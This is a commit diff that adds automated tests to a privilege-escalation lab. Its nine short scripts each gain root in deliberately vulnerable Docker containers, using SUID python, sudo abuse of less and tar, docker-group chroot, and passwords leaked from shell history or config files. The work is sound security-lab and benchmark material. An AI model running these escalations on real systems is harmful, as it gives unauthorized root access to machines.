add automated exploitability tests for all scenarios

Author: philippnormann

docker/test.sh

@@ -0,0 +1,44 @@
+#!/usr/bin/env bash
+# Automated exploitability tests for each PrivEsc scenario container.
+# Usage:
+#   ./test.sh                         # run all scenario tests
+#   ./test.sh 05_vuln_sudo_gtfo       # run test for a single scenario
+# Prerequisites:
+#   - Scenario containers launched via start.sh on localhost ports 5001-5013
+#   - sshpass installed for non-interactive SSH logins
+
+set -eo pipefail
+BASE_DIR="$(cd "$(dirname "$0")" && pwd)"
+BASE_PORT=5000
+SCEN="$1"
+
+run_scenario() {
+  local scenario="$1"
+  local testfile="${BASE_DIR}/tests/${scenario}.sh"
+  local idx=${scenario%%_*}
+  local port=$((BASE_PORT + 10#$idx))
+  echo "🧪  Testing $scenario on port $port..."
+  local out
+  out=$(sshpass -p trustno1 ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null lowpriv@localhost -p "$port" bash < "$testfile" 2>/dev/null)
+
+  if [[ "$out" == "root" ]]; then
+    echo "   ✅ PASS (got '$out')"
+  else
+    echo "   ❌ FAIL (got '$out')"
+    exit 1
+  fi
+}
+
+echo "🔍 Running scenario exploitability tests via SSH..."
+if [[ -n "$SCEN" ]]; then
+  if [[ ! -f "${BASE_DIR}/tests/${SCEN}.sh" ]]; then
+    echo "Error: scenario '$SCEN' not found" >&2; exit 1
+  fi
+  run_scenario "$SCEN"
+  exit
+fi
+
+for testfile in "${BASE_DIR}"/tests/*.sh; do
+  scenario=$(basename "$testfile" .sh)
+  run_scenario "$scenario"
+done

docker/tests/01_vuln_suid_gtfo.sh

@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit SUID python binary: escalate to root and print whoami
+python3 - << 'EOF'
+import os
+os.setuid(0)
+os.execl('/bin/sh', 'sh', '-c', 'whoami')
+EOF

docker/tests/02_vuln_password_in_shell_history.sh

@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit shell history password leak: extract and su to root
+pass=$(grep "su root" /home/lowpriv/.bash_history | head -n1 | sed -n "s/^echo '\\(.*\\)' | su root.*$/\\1/p")
+echo "$pass" | su root -c whoami

docker/tests/03_vuln_sudo_no_password.sh

@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit sudo no-password: run whoami as root
+sudo whoami

docker/tests/04_vuln_sudo_gtfo_interactive.sh

@@ -0,0 +1,10 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit sudo-gtfo interactive PTY: use script and less to escalate to root
+data=$(script -q /dev/null -c "sudo /usr/bin/less /etc/passwd" << 'EOF'
+!whoami
+q
+EOF
+)
+echo "$data" | grep -m1 -o root

docker/tests/05_vuln_sudo_gtfo.sh

@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit sudo-gtfo tar checkpoint: escalate to root via tar
+sudo tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='sh -c whoami' 2>/dev/null

docker/tests/06_vuln_docker.sh

@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit docker group: use docker run and chroot to escalate to root
+docker run --rm -v /:/mnt alpine chroot /mnt whoami 2> /dev/null

docker/tests/07_root_password_reuse_mysql.sh

@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit MySQL config password leak: extract and su to root
+data=$(grep -Po '(?<=password=).*' /home/lowpriv/.my.cnf)
+echo "$data" | su root -c whoami

docker/tests/08_root_password_reuse.sh

@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit root password reuse: su to root with lowpriv password
+echo 'trustno1' | su root -c whoami

docker/tests/09_root_password_root.sh

@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+set -e
+
+# Exploit weak root password: su to root with 'root'
+echo 'root' | su root -c whoami